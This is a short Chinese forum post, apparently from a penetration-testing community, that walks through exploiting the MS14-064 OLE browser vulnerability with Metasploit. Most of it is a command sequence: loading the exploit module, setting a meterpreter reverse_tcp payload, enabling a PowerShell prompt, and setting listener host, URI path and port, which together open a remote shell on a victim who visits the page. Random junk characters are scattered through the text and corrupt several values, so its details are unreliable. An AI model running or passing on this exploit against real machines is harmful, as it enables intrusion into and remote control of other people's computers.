1 g' t( r8 c* C8 |/ Q6 `1 U 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示
开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图:
/ C2 E0 K; b8 f, R0 Y5 h3 p 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp
3 R5 u; B4 c _& r6 r+ ]4 j" l) Q, d. {1 i$ N$ z8 u' V* {3 H set AllowPowershellPrompt true# ]) H( M4 W+ Q0 g
5 q/ p2 i1 X$ k Set LHOST 192.168.0.109
6 t$ Y5 B; c9 r0 b0 Gset SRVHOST 192.168.0.1097 a! P/ R% t3 m6 @% J
6 f3 I6 m: f1 \% }* A/ t% } Set uripath share: ] |3 Q5 P# s9 S9 [6 s% O0 _" u R
# \- B$ u; D- } Set srvport 801 I2 l0 |9 k& X! h) o: _7 I6 `( q
* P3 A: d) j- \3 F6 N; P : J6 ^, F+ ]& H; |1 U, s
* O$ g' `* t4 p8 P1 ^' m V ( I" s* E7 ^; U
0 O5 P! ]$ r8 w* z1 ^2 S0 ]! u
* D4 J8 Y n' O5 {. e5 j0 F4 k 0 Y" G: V( `, j$ I
3 k8 W& @1 T: d$ [; @0 m 9 t5 L+ A+ [0 X9 U$ g4 |' h1 o
# N- x# k, h" p5 }/ @; r 下面我们来访问本地地址如图:
$ V. P- J+ M0 G2 U7 ~; E9 _ Q
+ u& T0 F; n# R, C7 S f5 I. C" W , D6 R# A* [ I O
; V" G, M1 h. g7 r# o$ w3 y9 w 2 n) x! I, b. Z/ S) x$ y" n
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |